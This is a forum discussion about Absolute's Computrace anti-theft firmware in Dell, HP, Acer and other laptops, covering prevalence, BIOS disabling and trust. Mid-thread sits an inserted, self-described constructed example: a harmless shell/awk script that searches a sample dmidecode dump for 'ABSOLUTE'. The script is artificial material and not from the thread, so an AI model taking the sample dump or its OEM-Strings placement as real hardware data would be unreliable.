I have 4 laptops (2 Dell, 1 Compaq, 1 HP). They've been purchased at various times over the last 6 years, and not one of them has the option to enable this. The Dells are model M50 and M70 (business laptops), the HP is an 8530w (also a business laptop), and the Compaq is some random shitty home model I can't recall right now. Not one of them has an option to enable or disable this in the bios, and the older Dell and Compaq don't even have a TPM module. 60% just seems like a bullshit number to me. Maybe they meant 6%?
(yes I know anecdotal != fact)
Google is your friend,
http://www.absolute.com/company/pressroom/news/2009/06/Absolute-Acer-IntelAT
Acer also have computrace, in fact it has the newer version, probably more secure. In fact, some Sony models also have it. Look for "ABSOLUTE" in a dmidecode dump. I think that most Netbooks don't have it, but we don't have every notebook model to check.
It is disabled, yes. How do you know that? Did you read the source? It's closed. If you want to have software that can remotely erase or read your data in your notebook, it is up to you to trust Intel or Absolute.
Disabling it in the BIOS doesn't work.
Don't misinterpret us, they have a useful product. But it must be a little more secure, and *optional*.
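The dmidecode check suggested a few comments up (look for "ABSOLUTE" in a dmidecode dump), written out as an added example that is not any poster's code nor Absolute's or Core's. The function name dmi_find_string and the sample dump are constructed here; the page does not say which DMI structure carries the string on real hardware, so placing it under OEM Strings is an assumption.

```shell
#!/bin/sh
# Added example: report which DMI structures in a dmidecode dump mention a string.
# On a real machine (needs root):  dmidecode | dmi_find_string ABSOLUTE

# dmi_find_string NEEDLE
# Reads dmidecode text on stdin and prints one line per hit:
#   <handle> | <structure title> | <matching line>
# The match is case-insensitive, so "Absolute" and "ABSOLUTE" are both found.
dmi_find_string() {
    awk -v needle="$1" '
        BEGIN { needle = tolower(needle) }
        # Each structure begins with: Handle 0x0000, DMI type 0, 24 bytes
        /^Handle 0x/ {
            handle = $2; sub(/,$/, "", handle)
            want_title = 1
            next
        }
        # The line right after the handle line is the structure title.
        want_title { title = $0; want_title = 0 }
        index(tolower($0), needle) {
            line = $0; sub(/^[ \t]+/, "", line)
            printf "%s | %s | %s\n", handle, title, line
        }
    '
}

# Constructed sample dump (not captured from real hardware). Which structure
# holds the string on a real laptop is an assumption made for illustration.
sample_dump() {
cat <<'EOF'
# dmidecode (constructed sample)
Handle 0x0000, DMI type 0, 24 bytes
BIOS Information
    Vendor: Example BIOS Vendor
    Version: A01

Handle 0x0001, DMI type 1, 27 bytes
System Information
    Manufacturer: Example Corp
    Product Name: Example Laptop

Handle 0x000B, DMI type 11, 5 bytes
OEM Strings
    String 1: EXAMPLE-PLACEHOLDER
    String 2: Absolute placeholder string (constructed)
EOF
}

sample_dump | dmi_find_string ABSOLUTE
```

An empty result only shows that the string is absent from the SMBIOS tables that dmidecode reads.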
All those MS commercials mention the computer brands by name, and all of those brands include this.
If Microsoft is going to bundle their OEMs' brand names into their ads, they have to accept that the mistakes of those OEMs reflect on their advertisements.
It doesn't hurt to be nice.